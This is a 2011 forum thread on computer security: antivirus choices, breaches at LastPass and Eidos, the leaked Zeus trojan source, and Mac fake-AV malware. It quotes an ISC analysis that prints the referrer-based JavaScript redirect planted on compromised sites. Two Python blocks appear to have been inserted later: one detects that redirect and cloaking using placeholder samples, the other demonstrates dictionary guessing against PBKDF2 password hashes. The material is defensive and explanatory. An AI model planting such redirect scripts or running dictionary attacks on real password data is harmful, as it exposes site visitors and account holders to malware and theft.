
[Computer Security Thread] CVEs, or "Crap! Vulnerabilities! Eughhhhh..."


Posts

  • Dark Shroud, Registered User regular
    edited May 2011
    Ok I thought I had made a post here the other day. I’ve also mentioned the Tracking Protection before but I did not post any links.

    I've been using the tracking protection for a few weeks now. You need to load the lists into IE. Here's the link: http://iegallery.com/en/trackingprotectionlists/

    Simple Ad block was the preferred ad blocker until they started charging for it. I’ve just been using the immunization features from Spybot SD, Spywareblaster, & a couple of tracking protection lists instead of an ad blocker since then. Yeah a few still get through but they don’t bother me that much.

    Other than Spybot SD’s host file list I wouldn’t use any of those third parties that just dump thousands of entries in. That’s actually been shown to slow browsing down because of the time spent checking and conflicts.

    Besides MSE I would recommend Comodo’s free security suite. It does a great job and the AV doesn’t conflict with MSE. It also seems to actually do a decent job.

    My only complaint is the lack of a spell checker. I'm not a big fan of IE spell, and IE7pro was really good but it's just not working anymore. Google Toolbar has one as well but I don't want to have to use it.

  • TetraNitroCubane, The Djinnerator, At the bottom of a bottle, Registered User regular
    edited May 2011
    Thanks for the info, Dark Shroud. You've got me more and more interested in IE these days, particularly when it's paired with something like Sandboxie.

    In other news, there's apparently been a rash of poisoned images floating around on Google Image Search. This vector is being used not only to target people using Windows machines, but is also operating to attack OS X machines (as described on the previous page). The Internet Storm Center has a more thorough breakdown here on their page. Copy and paste of the attack analysis is under the spoiler.
    ISC wrote:
    1. The attackers compromise a number of legitimate web sites. I have noticed that they usually attack Wordpress installations, but any widely spread software that has known vulnerabilities can be exploited.

    2. Once the source (legitimate) web sites have been exploited, the attackers plant their PHP scripts, similar to those I described in previously mentioned diaries. These scripts vary from simple to very advanced scripts that can automatically monitor Google trend queries and create artificial web pages containing information that is currently of interest. That is actually how they generate new content – if you ever wondered how they had those web sites about Bin Laden up quickly it is because they automatically monitor the latest query trends and generate web pages with artificial content.

    These web sites contain not only text, but also images that are acquired from various web sites. Again, their scripts use various search engines to locate these pictures (I will probably post a diary about this soon too). They embed links to pictures which are really related to the topic so the automatically generated web page contains real looking content.

    3. Google now crawls through these web sites. The scripts that the attackers put will detect Google’s bots (either by their IP address or the User Agent) and will deliver special pages back containing automatically generated content. Google will also parse links to images and, if appropriate, populate the image search database.

    4. Now, when a user searches for something through the Google image search function, thumbnails of pictures are displayed. Depending on the automatically generated content in step 3), number of links to the web page and other parameters known to Google, the attacker’s page will be shown at a certain position in the results web page. The exploit happens when a user clicks on the thumbnail.
    Google now shows a special page that shows the thumbnail in the center of the page, links to the original image (no matter where it is located) on the right and the original web site (the one that contained the image) in the background. This is where the “vulnerability” is. Google displays this in a simple iframe:

    <iframe scrolling=auto id=rf src="http://REMOVED" frameborder=0 allowtransparency=true style="width:100%;height:100%">

    The user’s browser will automatically send a request to the bad page which runs the attacker’s script (the one set in step 1). This script checks the request’s referrer field and, if it contains Google (meaning this was a click on the results page in Google), the script displays a small JavaScript script:

    <script>var url = "http://REMOVED/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default";
    if (window!=top) {top.location.href = url;} else document.location= url;
    </script>

    This causes the browser to be redirected to another site that is serving FakeAV.

    Apparently Google isn't the only site getting hammered with malware lately. Most social networking sites were plagued with clickjacking and redirecting attacks in the wake of the Osama Bin Laden incident. Fraudsters love using hot-topic issues to lure people into their infected pages, and so Facebook and Twitter have been alight with malware, not to mention Search Engine Optimization techniques on most of the major search pages.

    Bottom line for most of these attacks: If you're running some sort of script and plugin control with your browser, you're most likely safe. The attacks redirect you to a malicious page where a script attack is launched, so NoScript or a browser whitelist are good protections against such infection attempts.

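    The ISC write-up above describes two things a site owner can look for in their own pages: content served only to Google's crawler (cloaking) and an inline script that reads document.referrer and then redirects the window off-site. The following Python checker is an added example, not code from the ISC diary or from this thread; it runs over constructed sample responses (the hostnames are placeholders) captured under different User-Agent and Referer values.

```python
import hashlib
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Inline <script> bodies are where the ISC sample places the redirect.
_SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
_REFERRER_RE = re.compile(r"document\.referrer", re.I)
# An assignment (not a comparison) to the window's or the top frame's location.
_REDIRECT_RE = re.compile(r"\b(?:top|window|self|document)\.location(?:\.href)?\s*=(?!=)", re.I)
_URL_RE = re.compile(r"""["'](https?://[^"'\s]+)["']""", re.I)


@dataclass(frozen=True)
class Fetch:
    """One retrieval of the same URL under a given User-Agent / Referer pair."""
    user_agent: str
    referer: str
    body: str


def find_referrer_redirects(html: str, page_host: str) -> list[str]:
    """Return off-site URLs that an inline script sends the window to after
    reading document.referrer (the FakeAV hand-off in the ISC analysis)."""
    hits = []
    for script in _SCRIPT_RE.findall(html):
        if not (_REFERRER_RE.search(script) and _REDIRECT_RE.search(script)):
            continue
        for url in _URL_RE.findall(script):
            if urlparse(url).hostname != page_host and url not in hits:
                hits.append(url)
    return hits


def is_crawler(user_agent: str) -> bool:
    return "googlebot" in user_agent.lower()


def detect_cloaking(fetches: list[Fetch]) -> bool:
    """True when every crawler-facing body differs from every browser-facing body."""
    crawler = {hashlib.sha256(f.body.encode()).hexdigest() for f in fetches if is_crawler(f.user_agent)}
    browser = {hashlib.sha256(f.body.encode()).hexdigest() for f in fetches if not is_crawler(f.user_agent)}
    return bool(crawler) and bool(browser) and crawler.isdisjoint(browser)


def assess(page_host: str, fetches: list[Fetch]) -> dict:
    """Summarise findings for one URL fetched several ways: cloaking verdict plus
    each redirect target and the Referer values under which it was served."""
    redirects: dict[str, list[str]] = {}
    for f in fetches:
        for url in find_referrer_redirects(f.body, page_host):
            redirects.setdefault(url, []).append(f.referer or "(none)")
    return {"cloaked": detect_cloaking(fetches), "redirects": redirects}


# --- constructed sample responses (placeholder hosts, not real sites) ---------
HOST = "compromised-blog.example"
CRAWLER_VIEW = "<html><body><h1>hot topic</h1><p>auto-generated text</p><img src='/pic.jpg'></body></html>"
NORMAL_VIEW = "<html><body><h1>My blog</h1><p>Nothing to see.</p></body></html>"
# Served only when the Referer says the visitor came from Google; same shape as
# the script quoted in the ISC write-up, with a placeholder redirect host.
REDIRECT_VIEW = (
    "<html><body><script>var url = \"http://fakeav-redirect.example/in.cgi?2&seoref=\""
    "+encodeURIComponent(document.referrer)+\"&ur=1\";"
    "if (window!=top) {top.location.href = url;} else document.location= url;"
    "</script></body></html>"
)
# Benign use of document.referrer (an analytics pixel, no navigation): must not be flagged.
ANALYTICS_VIEW = ("<html><body><script>img.src='https://stats.example/px?r='"
                  "+encodeURIComponent(document.referrer);</script></body></html>")

SAMPLE_FETCHES = [
    Fetch("Mozilla/5.0 (compatible; Googlebot/2.1)", "", CRAWLER_VIEW),
    Fetch("Mozilla/5.0 (Windows NT 6.1) Firefox/4.0", "", NORMAL_VIEW),
    Fetch("Mozilla/5.0 (Windows NT 6.1) Firefox/4.0", "http://www.google.com/imgres?q=topic", REDIRECT_VIEW),
]

if __name__ == "__main__":
    print(assess(HOST, SAMPLE_FETCHES))
```

    A real run would replace SAMPLE_FETCHES with responses fetched from the site under those same User-Agent/Referer combinations; any non-empty "redirects" entry on a page you did not write is the compromise the ISC diary describes.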
  • Dark Shroud, Registered User regular
    edited May 2011
    Well the first thing is IE7 was the first browser to have its own sandbox mode built in. I just like to remind people of this. PA forums aren't too bad but I get tired of not being able to have conversations about browsers without Firefox & Chrome fanboys being completely rude pricks.

    Second thing is Comodo has a better sandbox than Sandboxie and it's free in their free security suite. If you're into that kind of security it's really worth looking into.

  • stigweard, Registered User regular
    edited May 2011
    Dark Shroud wrote: »
    Well the first thing is IE7 was the first browser to have its own sandbox mode built in. I just like to remind people of this. PA forums aren't too bad but I get tired of not being able to have conversations about browsers without Firefox & Chrome fanboys being completely rude pricks.

    Second thing is Comodo has a better sandbox than Sandboxie and it's free in their free security suite. If you're into that kind of security it's really worth looking into.

    Protected mode for IE 7 was only built into Vista. On XP (the vast majority of machines), it only moved ActiveX away from being run by explorer into another iexplore thread. It ended up being pretty damn ineffective in both cases. Back then, any browser was better by virtue of not being able to use ActiveX as the majority of attack vectors used it.

  • yotes, Registered User regular
    edited May 2011
    Looks like LastPass got somewhat pwned as well, so everyone using the service should go and rush to change your password to find everyone is doing that at the moment so it's overloaded and you can't do shit.

    To be fair to them, they're handling whatever happened a bit better than Sony did.

  • TetraNitroCubane, The Djinnerator, At the bottom of a bottle, Registered User regular
    edited May 2011
    yotes wrote: »
    Looks like LastPass got somewhat pwned as well, so everyone using the service should go and rush to change your password to find everyone is doing that at the moment so it's overloaded and you can't do shit.

    To be fair to them, they're handling whatever happened a bit better than Sony did.

    Holy crap, thanks for the update. What is with the internet lately? Leaking like a sieve.

    I do admire how up front about the entire process that update from LastPass is - from what they noticed to their immediate actions in reply to it. Also, it sounds like they must be using a decent hash, too.
    If you have a strong, non-dictionary based password or pass phrase, this shouldn't impact you - the potential threat here is brute forcing your master password using dictionary words, then going to LastPass with that password to get your data. Unfortunately not everyone picks a master password that's immune to brute forcing.

    Still, changing the master password might still be a good idea.

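    The post above makes two claims about the LastPass situation: a slow ("decent") hash raises the cost of every guess, and a non-dictionary master password is not found by a dictionary run at all. The Python below is an added example, not code from the thread or from LastPass; it uses PBKDF2-HMAC-SHA256 as a stand-in for the unknown real scheme, a constructed salt and a constructed seven-word list, and measures how the work factor changes the per-guess cost.

```python
import hashlib
import os
import time
from typing import Iterable, Optional


def derive(master_password: str, salt: bytes, iterations: int) -> bytes:
    """Derive the stored verifier with PBKDF2-HMAC-SHA256 (a stand-in for a 'decent hash')."""
    return hashlib.pbkdf2_hmac("sha256", master_password.encode("utf-8"), salt, iterations)


def dictionary_guess(target: bytes, salt: bytes, iterations: int, wordlist: Iterable[str]) -> Optional[str]:
    """The offline threat described in the post: given a leaked salt and verifier,
    try every dictionary word. Returns the matching word, or None when the list is exhausted."""
    for candidate in wordlist:
        if derive(candidate, salt, iterations) == target:
            return candidate
    return None


def seconds_per_guess(iterations: int, samples: int = 5) -> float:
    """Wall-clock cost of one derivation at a given work factor (the knob the service controls)."""
    salt = os.urandom(16)
    start = time.perf_counter()
    for _ in range(samples):
        derive("timing-probe", salt, iterations)
    return (time.perf_counter() - start) / samples


def cost_ratio(low_iterations: int, high_iterations: int) -> float:
    """How many times more expensive each guess becomes when the work factor is raised."""
    return seconds_per_guess(high_iterations) / seconds_per_guess(low_iterations)


# Constructed inputs: a tiny wordlist standing in for a real dictionary, a fixed salt.
WORDLIST = ["123456", "password", "letmein", "qwerty", "password1", "dragon", "monkey"]
SALT = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed, not a real value
ITERATIONS = 5000
WEAK = "password1"                      # in the dictionary: falls to the first pass
STRONG = "stapler-kayak-velvet-orbit-42"  # not in any wordlist: the run simply ends


def demo() -> tuple:
    """Run the dictionary pass against both verifiers; returns (weak_hit, strong_hit)."""
    weak_hit = dictionary_guess(derive(WEAK, SALT, ITERATIONS), SALT, ITERATIONS, WORDLIST)
    strong_hit = dictionary_guess(derive(STRONG, SALT, ITERATIONS), SALT, ITERATIONS, WORDLIST)
    return weak_hit, strong_hit


if __name__ == "__main__":
    print("dictionary pass:", demo())
    print("cost multiplier 1 -> 20000 iterations: %.0fx" % cost_ratio(1, 20000))
```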
  • Peter Principle, Registered User regular
    edited May 2011
    TetraNitroCubane wrote: »
    Where would hitman store a log file?

    Start up Hitman Pro again, then click the settings button in the lower left. From there, you should see a tab on the top row, with one of the options listed as "History".

    Edit response: Judging by the filename and the location, I'm going to say that it's looking more and more like malware. Randomized-name DLL files hiding in temporary folders tend to be bad news. One thing you might try for more 'subtle' verification is this: Reboot your computer. When it restarts, be on the lookout for an error message about that DLL file not being loaded. If that does, in fact, happen, then something in your registry is actively trying to load that weirdo DLL - And you've got some malware on your hands.

    If no errors pop up, scan with Hitman again. Rootkits typically have more than one component in operation, where component A watches B and C, B watches A and C, and C watches A and B. If one of A, B, or C gets knocked out, then the other components replace it. So there's a chance that, if the infection is still active, the DLL could be regenerated and Hitman will find it once more after rebooting.

    Going to have to say, though, that it's sounding more and more like a reformat might be your best bet. Or at the very least, a LiveCD or RescueCD second opinion. Sorry for the downer.

    No error messages on startup, and Hitman didn't find any additional hazardous files.

    I happen to have a UBCD4Win boot disc, and a UBCD boot disc. If I boot from a disc, what do I then do to scan my computer? Go to a site, like Housecall or back to the Hitman site?

  • Dark Shroud, Registered User regular
    edited May 2011
    stigweard wrote: »
    Protected mode for IE 7 was only built into Vista. On XP (the vast majority of machines), it only moved ActiveX away from being run by explorer into another iexplore thread. It ended up being pretty damn ineffective in both cases. Back then, any browser was better by virtue of not being able to use ActiveX as the majority of attack vectors used it.

    First off if you care about security you don't use WinXP. Second IE7 also changed the ability for ActiveX controls to auto run by default. I used to set IE6 & previous versions to do this manually. Now in newer versions ActiveX controls have to be signed to even prompt the user to allow them to run.

    I used to go to malicious sites to test browser settings. I would get a good laugh when the pages loaded in Opera and would ask me to run IE or Firefox.

    Chrome calls their version of ActiveX Native Code.

  • stigweard, Registered User regular
    edited May 2011
    Dark Shroud wrote: »
    stigweard wrote: »
    Protected mode for IE 7 was only built into Vista. On XP (the vast majority of machines), it only moved ActiveX away from being run by explorer into another iexplore thread. It ended up being pretty damn ineffective in both cases. Back then, any browser was better by virtue of not being able to use ActiveX as the majority of attack vectors used it.

    First off if you care about security you don't use WinXP. Second IE7 also changed the ability for ActiveX controls to auto run by default. I used to set IE6 & previous versions to do this manually. Now in newer versions ActiveX controls have to be signed to even prompt the user to allow them to run.

    I used to go to malicious sites to test browser settings. I would get a good laugh when the pages loaded in Opera and would ask me to run IE or Firefox.

    Chrome calls their version of ActiveX Native Code.

    Reality very rarely follows what is theoretically best. Vista had a 70%+ rejection rate and many businesses, especially smaller ones, couldn't financially or otherwise technically upgrade. Peripheral compatibility for consumers was a joke up until SP1 and was non existent for businesses. The software situation was much worse as much of the underpinnings were changed, it forced people to either stick with xp or upgrade their software. In some situations it was impossible as the vendors didn't even release compatible versions. Certainly, there were workarounds in many cases but most were financially untenable.

    As for ie7, there were flaws that allowed the new security features to be completely bypassed (iirc within the first two weeks of the official release). I can't think of a single machine I had to clean that didn't have install activex bar disabled. It quickly became irrelevant anyway as we moved towards the situation we are in now where the majority of attacks are in combination - i.e. using js and an iframe to load a pdf, flash or jar file (sometimes all three) in order to gain entry to the system. A security warning for loading controls does no good when those already installed are vulnerable, regardless of the browser running them.

  • TetraNitroCubane, The Djinnerator, At the bottom of a bottle, Registered User regular
    edited May 2011
    Peter Principle wrote: »
    Where would hitman store a log file?

    Start up Hitman Pro again, then click the settings button in the lower left. From there, you should see a tab on the top row, with one of the options listed as "History".

    Edit response: Judging by the filename and the location, I'm going to say that it's looking more and more like malware. Randomized-name DLL files hiding in temporary folders tend to be bad news. One thing you might try for more 'subtle' verification is this: Reboot your computer. When it restarts, be on the lookout for an error message about that DLL file not being loaded. If that does, in fact, happen, then something in your registry is actively trying to load that weirdo DLL - And you've got some malware on your hands.

    If no errors pop up, scan with Hitman again. Rootkits typically have more than one component in operation, where component A watches B and C, B watches A and C, and C watches A and B. If one of A, B, or C gets knocked out, then the other components replace it. So there's a chance that, if the infection is still active, the DLL could be regenerated and Hitman will find it once more after rebooting.

    Going to have to say, though, that it's sounding more and more like a reformat might be your best bet. Or at the very least, a LiveCD or RescueCD second opinion. Sorry for the downer.

    No error messages on startup, and Hitman didn't find any additional hazardous files.

    I happen to have a UBCD4Win boot disc, and a UBCD boot disc. If I boot from a disc, what do I then do to scan my computer? Go to a site, like Housecall or back to the Hitman site?

    There should be a number of tools already on the UBCD, I believe, for scanning. Hopefully you'll boot into a network aware capacity, and be able to update them. Alternatively, you can scan with something you've downloaded, like MBAM or Hitman again.

    The other alternative is to use a rootkit scanner, something like rootkit revealer, f-secure blacklight, Sophos Anti-rootkit, or the mighty GMER. However, use caution when acting on information from these anti-rootkit tools. They are powerful, but their output can be hard to decode. Rather than just saying "Hey! Here's a rootkit!" they typically display files, hooks, and processes that show rootkit-like behavior. For example, both Daemon tools and SecuROM DRM set off rootkit revealer, and 'removing' either of them will render them inoperative. So it's possible you can damage a legitimate file/process if you're too hasty, and it's always best to investigate further when you get positives from any of these tools. Typically it's best to Google the results flagged as suspicious, or get the advice of experts.

  • TetraNitroCubane, The Djinnerator, At the bottom of a bottle, Registered User regular
    edited May 2011
    Hey everyone! It's time for your favorite song and dance! New vulnerabilities have been disclosed for Adobe Flash, with exploits and attacks surfacing in the wild. So go ahead and grab the latest version to patch that up - keeping in mind to avoid unwanted toolbars on installation (if you use the installer, rather than manual methods).

    CHANGE PLACES!

  • Orca, Also known as Espressosaurus Wrex, Registered User regular
    edited May 2011
    One day, Adobe flash will be secure.

    It will be because everyone has abandoned that piece of junk platform.

  • TetraNitroCubane, The Djinnerator, At the bottom of a bottle, Registered User regular
    edited May 2011
    Orca wrote: »
    One day, Adobe flash will be secure.

    It will be because everyone has abandoned that piece of junk platform.

    Quite agreed. I'm wondering if HTML5 is going to be much more secure than flash, personally.

    In other news: It looks like another case of server-side hacking has occurred, this time on the Eidos and Human Revolution websites. Joystiq has a more complete story. Looks like mostly email addresses were stolen, though apparently up to 350 job applications were also pinched. Seems pretty minor compared to some other leaks lately (not much personal data was collected for regular users, no passwords or secret questions - just email addresses), but it's still worrisome that the server-side aspect of our web experience is the juicy (and vulnerable) target these days.
    Joystiq wrote:
    This past Wednesday, hackers reportedly broke into the Eidos and Deus Ex: Human Revolution websites, erecting an "Owned by Chippy1337" banner and signing some names and aliases below (a possible red herring). In IRC chat logs, obtained by former Washington Post reporter Brian Krebs, the hackers also claim to have stolen the personal data of "at least" 80,000 users. So, first things first: If you've registered on an Eidos site or with the Deus Ex site, now's the time to change your password (we should all be used to this by now).

    Eurogamer has spoken with "Venuism," one of the hackers implicated in the theft, who clarified that the "src" (source code) the hackers allegedly obtained pertains to the Deus Ex website and not the actual game. As of this writing, the Deus Ex website still isn't back to normal, while Eidos.com, which was also apparently compromised, appears fine now. (Venuism maintains that he and the others listed below the banner have been set up by a rival group.)

    Most troubling, Venuism suggested that the stolen user data -- the extent of which is unclear -- had already been leaked. We've contacted Eidos parent company Square Enix for an official comment on the situation.

    And here's the full statement issued by Square-Enix in reply to this:
    "Square Enix can confirm a group of hackers gained access to parts of our Eidosmontreal.com website as well as two of our product sites. We immediately took the sites offline to assess how this had happened and what had been accessed, then took further measures to increase the security of these and all of our websites, before allowing the sites to go live again. Eidosmontreal.com does not hold any credit card information or code data, however there are resumes which are submitted to the website by people interested in jobs at the studio. Regrettably up to 350 of these resumes may have been accessed, and we are in the process of writing to each of the individuals who may have been affected to offer our sincere apologies for this situation. In addition, we have also discovered that up to 25,000 email addresses were obtained as a result of this breach. These email addresses are not linked to any additional personal information. They were site registration email addresses provided to us for users to receive product information updates. No dissemination or misappropriation of any other personal information has been identified at this point. We take the security of our websites extremely seriously and employ strict measures, which we test regularly, to guard against this sort of incident."

    Late Edit: Sorry to pile on the thread, but I just read this over at Wilders, and it rather disturbed me. Apparently the source code for the notorious Zeus banking trojan has been released to the masses as freeware. The trojan used to be available only for purchase in certain underground rings, but now it's apparently easy to grab for no money at all. Softpedia has a more complete story here.
    Softpedia wrote:
    Observers were taken by surprise in January when someone other than Gribodemon posted announcements on underground forums that the ZeuS source code is available for sale.

    The version advertised was 2.0.8.9, which apparently is the same as the one of the package being distributed now for free.

    "This weekend we found the complete source code for this crime kit being leaked to the masses on several underground forums as well as through other channels.

    "[...] We even compiled it in our lab and it works like a charm," announced Peter Kruse, security specialist at Danish IT security firm CSIS Security Group.

    The existence of a password-protected .rar archive allegedly containing the ZeuS source code has been known for several weeks now, but researchers believed it served to showcase the project's file tree.

    This is the first report of working ZeuS source code being available for free, which opens up the door to a lot of possibilities. Any malware writer can now theoretically create a version of the trojan with any modifications they desire.

    Hopefully, the availability of the code will also help antivirus vendors to create better signatures that are able to detect most variations of the trojan.

    Not enough D: for that situation. Zeus was, and remains, quite nasty. It has been able to regularly evade antivirus detections, and has been responsible for some rather huge botnets, worldwide. Let's hope the vendors are keyed into this, and the freeware source is enough to bolster their detections.

  • TheCanMan, GT: Gasman122009, Jersey, Registered User regular
    edited May 2011
    I just have a quick question. I get Norton Security Suite with my Comcast internet subscription. Would it be more advisable to use it, or something like Windows Security Essentials or Avast (which I've read nothing but glowing recommendations for)?

    I'm guessing WSE and Avast get recommended so often because they're free. But if Norton is also free, how does it compare to those two?

  • TetraNitroCubane, The Djinnerator, At the bottom of a bottle, Registered User regular
    edited May 2011
    TheCanMan wrote: »
    I just have a quick question. I get Norton Security Suite with my Comcast internet subscription. Would it be more advisable to use it, or something like Windows Security Essentials or Avast (which I've read nothing but glowing recommendations for)?

    I'm guessing WSE and Avast get recommended so often because they're free. But if Norton is also free, how does it compare to those two?

    Historically, Norton is a piece of shit. It used to be extremely bloated, and didn't offer good protection. I've not used it in almost a decade at this point, but from what I understand the latest offerings have really changed, and Symantec are trying hard to make the software much better. I have heard surprisingly good reviews about Norton 360, but I unfortunately have no firsthand experience with it.

    When it comes to efficacy, it's extremely difficult to tell you which suite is going to be best. MSE and Avast do come with high recommendations - not only because they are free, but because they do perform well in tests. Norton Security Suite, I believe, is essentially Norton 360 with some other applications bundled in. If it's running on the same core as Symantec's corporate antivirus, then Antivirus Comparatives ranked them fairly competitively last year - though they didn't do well in the proactive scanning (i.e. detecting unknown threats).

    In the end, finding any of those three choices will do well for you. None of them are going to give you 100% protection, so ensure you're using other defensive measures (sandboxing and/or rights dropping), particularly for your browser (Some form of script controlling and flash blocking is highly recommended). Usually it's all going to boil down to which of the three antivirus suites runs smoothest and has the best interface for you. Sometimes people complain about bloat with Avast, and I've even seen some issues with MSE being resource-intensive. Others see no such thing. This all seems to be very case-by-case. Essentially, figuring out which offering is most compatible with your system and habits is going to be the best deciding factor - When it comes to protection, it's almost impossible to give a good analysis, since each of the three options will catch and/or miss threats the other two miss/catch.

    Sorry to not give a more clear-cut answer, but in my experience there's really no "best" antivirus out there. If we were talking two or three years ago, I'd tell you to avoid Norton like the plague, but they've been working hard to turn it around.

  • TheCanMan, GT: Gasman122009, Jersey, Registered User regular
    edited May 2011
    Cool, thanks. That's pretty much all I wanted to hear. I've been using Norton so I'll probably just keep on doing that. Just wanted to make sure it wasn't an inferior option.

  • joshgotro, Deviled Egg, The Land of REAL CHILI, Registered User regular
    edited May 2011
    I think this is the right thread. All of a sudden consent.exe is running and it wants consent to run setup##############.exe and every time I deny it it pops up again with another setup###.exe file asking for consent.

    The setup executable is creating new .exes in my Temp folder. I can watch it create a new .exe.

    HELP.

    Edit:
    Windows Vista, all up to date, and running AVG up to date.

  • Dark Shroud, Registered User regular
    edited May 2011
    Forget AVG and run an antimalware scanner like Malwarebytes Anti-Malware or SUPERAntiSpyware.

    Have them run a full scan on the system. Since both are free I use both and suggest this to others.

  • TetraNitroCubane, The Djinnerator, At the bottom of a bottle, Registered User regular
    edited May 2011
    I completely echo Dark Shroud on this one: Get yourself Malwarebytes, install it, update it, and run a full system scan. The fact that something is continuously trying to launch shady EXEs is worrisome. Hopefully you can stop it in normal mode, but if the consent.exe spam gets too heavy, you might have to boot into safe mode to get control of the machine enough to run a scan.

    After running Malwarebytes, I'd run a secondary scan with AVG, or some other antivirus, as well.

  • Dark Shroud, Registered User regular
    edited May 2011
    Can anyone recommend a good Linux AV scanner? I run Puppy Linux off a USB drive and need a good AV for it.

  • TetraNitroCubane, The Djinnerator, At the bottom of a bottle, Registered User regular
    edited May 2011
    Dark Shroud wrote: »
    Can anyone recommend a good Linux AV scanner? I run Puppy Linux off a USB drive and need a good AV for it.

    I admit I don't have experience with Linux when it comes to running AV, but here are some of the options I've heard of:
    • ESET NOD for Linux - This just recently left beta, and so is now retail software. Unfortunately that means it's going to cost money, but it's freakin' NOD, so the quality and detections are what you pay for. Still, might be overkill, and probably not the best thing for a mobile installation.

    • ClamAV - The open source Antivirus solution. People swear by it, but personally I loathe Clam. It's clunky, it's slow, the definitions always lag behind the curve, and it doesn't have on-access scanning. If you're looking for a free on-demand scanner, this will fit the bill in a pinch, but I think there are better options out there. I admit, I'm biased because I've had the OS X version miss some obviously bad files in the past, so I consider their definitions suspect.

    • Avast! Linux home edition - Avast! released a Linux version of their software for free. It seems to have a frontend GUI as well as command line accessibility, and the ability to automatically update itself. If it plays nice with a mobile install, this might be a good option for a rescue scanner.

    • AVG Linux free edition - What it says on the tin, AVG for Linux. Many people complain about bloat with AVG, but I'm uncertain as to how it performs with Linux. Still, it's another option if you wish to check it out.

  • Samir Duran Duran, Registered User regular
    edited May 2011
    So this thread is a year old.

    Happy birthday, thread.


    Oh wait no it is actually older. Happy belated birthday, thread.

  • TetraNitroCubane, The Djinnerator, At the bottom of a bottle, Registered User regular
    edited May 2011
    Good gravy, has it been that long? I really need to get around to writing a new guide, preferably a visual one.

    But anyhow, thanks for all the help everyone's been doling out, as well as the conversation and input. What a weird year it's been, too, from Stuxnet to the PSN hack. Here's to staying safe for another year.

    Oh, and malware can still go die in a fire.

  • yotes, Registered User regular
    edited May 2011
    Mac users: your hip, elitist smugness won't defend you from massive porny malware infestations anymore.

    Also, Apple doesn't really want to help you.

  • Trentus, Registered User regular
    edited May 2011
    yotes wrote: »
    Mac users: your hip, elitist smugness won't defend you from massive porny malware infestations anymore.

    Also, Apple doesn't really want to help you.

    And all you have to do to get infected is stumble upon a page serving it, accept the offer to "clean your machine", download the zip, if it doesn't automatically extract, extract it, double click the package, click through several install screens and give it an administrator's username and password.

    It's actually easier to remove than it is to become infected.

    So long as you're not a complete silly goose, you can still be smug and elitist.

    Trentus on
    TetraNitroCubane The Djinnerator At the bottom of a bottle Registered User regular
    edited May 2011
    I've been holding my tongue and trying to avoid spamming the thread over it, but the Mac Malware situation has gotten a bit worse since the initial report posted last page. It's noteworthy, not because of the fact that the malware is particularly aggressive or damaging, but because it indicates that criminals are taking notice.

    I'm going to soapbox a bit here (And keep in mind that this is coming from someone who uses both platforms, and spends an increasing amount of time on OS X): 'Out of the box' OS X and Apple products are more secure than their Windows counterparts. This has nothing to do with software design on a fundamental level, but rather with decisions to keep legacy support in newer versions of Windows. OS X has always respected the principle of least privilege, but Windows can't do that without borking a shitload of software, so they avoid it. So, granted, point in Apple's favor.

    But who cares? In my opinion it is actually easier to make a Windows machine more secure than an OS X machine. This is because people recognize there are security issues to be dealt with, and software is available to handle those issues - Usually for free! Instead, Apple and OS X users decide that they're fucking invincible, and how dare you imply otherwise.

    Make no mistake, the largest security threat against the Apple brand at the moment is hubris. They have cultivated an image for their platform which invokes the idea that nothing bad can ever happen to the end user. Which is precisely why their end users are more likely to fall victim to social engineering attacks. What good is the principle of least privilege if your user is so confident in his/her inability to get infected that they download, install, and input passwords without thinking? Or run Safari with 'Execute Trusted Files on Download' activated?

    The prevailing attitude in the community, particularly on the Apple forums, is "You'll never get infected... Unless you're a moron!" The blame for infection is always heaped on the user, never on the software or the brand that perpetuates a juicy hotbed of social engineering tactics. And then, let's not start about the semantic arguments. Yes, I know there are no known viruses for OS X. Viruses also constitute a small and shrinking portion of PC malware. Besides that, OS X still has plenty of trojans, backdoors, and other malware - But I guess those aren't 'real' threats? Almost every fake AV attack is a trojan these days.

    In the end, any software and any platform is as secure as you want it to be, and as secure as you make it. But the idea that OS X cultivates, an image of "You don't need to make this secure!", means that they train their users to be the silliest, most smug geese on the planet. Since OS X has been proven vulnerable at pwn2own several years running, I'd assume that now that sights have been leveled at the Apple brand, there's going to be some nasty developments in the future. Here's to hoping that Apple takes a more security conscious approach to user treatment in the future, rather than sweeping shit under the rug.

    And that was too much soap boxing. My apologies. I just wanted to get that out of my system for a few days, ever since reading through the Apple forums.

    TetraNitroCubane on
    RBach Registered User regular
    edited May 2011
    yotes wrote: »

    Because if I were to call up Microsoft for help with a malware infection they'd be so helpful, too. Oh, wait, no, they'll just suggest getting an antivirus. Which is exactly what Apple is doing (and should do).

    RBach on
    yotes Registered User regular
    edited May 2011
    TetraNitroCubane wrote: »
    I've been holding my tongue and trying to avoid spamming the thread over it, but the Mac Malware situation has gotten a bit worse since the initial report posted last page. It's noteworthy, not because of the fact that the malware is particularly aggressive or damaging, but because it indicates that criminals are taking notice.

    Yes, this is more or less what I would have said if I hadn't felt like being snarky and lazy.

    How's the state of MacOS antivirus nowadays? I hope it's not as dire as the Linux side. ClamAV can go eat a dick or five.

    yotes on
    TetraNitroCubane The Djinnerator At the bottom of a bottle Registered User regular
    edited May 2011
    yotes wrote: »
    Yes, this is more or less what I would have said if I hadn't felt like being snarky and lazy.

    How's the state of MacOS antivirus nowadays? I hope it's not as dire as the Linux side. ClamAV can go eat a dick or five.

    There are actual decent options available. Intego's Virus Barrier is supposed to be pretty good. Additionally, ESET have released their NOD Client for OS X. Believe it or not, there's also a free option, with Sophos Antivirus. Personally, I've been using NOD, but that's because I'm an ESET fanboy, and they've saved my bacon a few times in the past. I will note that most antivirus options on OS X suffer from a bit more system drag than the Windows counterparts, though. I attribute this to the kinks still being worked out. (And yes, ClamAV is awful, awful, awful)

    Also... Okay, I swear I'm not trying to stir the pot here. After a few hours, I realized my above post probably came off as spiteful and vindictive, and I'm not trying to be petty. I like OS X, just as I like Windows 7, it's just that I don't like it when companies mislead their customers. So please forgive me if I flew off the handle.

    That being said, Apple's response to the growing malware attacks (in the form of an internal memo) can be seen in this latest article. While I can understand that Apple doesn't want to be involved in recommending anti-malware software, I find it strange that the official policy is to not help people remove the malware - Mostly because it's been said time and time again that this malware is easy to remove. I suppose they have reasons for keeping the issue at arm's length, but I'm uncertain what they might be. I have to admit, I'm rather rubbed the wrong way by the bullet points at the end of the memo:
    ZDnet wrote:
    Important:
    • Do not confirm or deny that any such software has been installed.

